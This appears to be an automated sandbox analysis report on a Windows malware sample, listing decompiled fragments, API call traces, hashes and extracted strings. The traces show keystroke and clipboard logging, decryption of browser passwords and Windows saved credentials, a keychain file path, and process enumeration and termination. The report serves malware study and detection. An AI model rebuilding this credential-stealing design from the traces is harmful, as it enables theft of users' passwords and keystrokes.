                                                                                • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 1727351239-0
                                                                                • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                                                                • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                                                                • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                                                                • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                                                                • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                                                                • String ID:
                                                                                • API String ID: 3911305588-0
                                                                                • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                                                                • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                                                                • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                                                                • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E0040D7C0(void* __eflags) {
                                                                                				char* _t5;
                                                                                				void* _t20;
                                                                                
                                                                                				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				E004126BC(atoi(_t5));
                                                                                				E004017DD(_t20 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                                                                • atoi.MSVCRT ref: 0040D7D3
                                                                                  • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                                                                  • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                                                                  • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                                                                • String ID:
                                                                                • API String ID: 1377568529-0
                                                                                • Opcode ID: c0c842b94adebbeffcdd60d45bfb27ce5f658012aea40baa5d5ea11c5c5959e5
                                                                                • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                                                                • Opcode Fuzzy Hash: c0c842b94adebbeffcdd60d45bfb27ce5f658012aea40baa5d5ea11c5c5959e5
                                                                                • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E0040DCD4() {
                                                                                				void* _t15;
                                                                                				intOrPtr _t19;
                                                                                
                                                                                				E0040AC8C();
                                                                                				exit(0);
                                                                                				while(1) {
                                                                                					_t19 =  *0x41beb8; // 0x0
                                                                                					if(_t19 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					Sleep(0x64);
                                                                                				}
                                                                                				E00408245();
                                                                                				E004017DD(_t15 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • exit.MSVCRT ref: 0040DCDB
                                                                                • Sleep.KERNEL32(00000064), ref: 0040DCED
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                                                                • String ID:
                                                                                • API String ID: 772260455-0
                                                                                • Opcode ID: 42667989ee0e8f97d07c6c569d129a008f98a6c3cfb6f0e5f586f63e0d7bab1a
                                                                                • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                                                                • Opcode Fuzzy Hash: 42667989ee0e8f97d07c6c569d129a008f98a6c3cfb6f0e5f586f63e0d7bab1a
                                                                                • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                                                • String ID: [LCtrl] $ [RCtrl]
                                                                                • API String ID: 4257247948-618823999
                                                                                • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                                                                • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                                                                • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                                                                • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                                                                • String ID: open
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
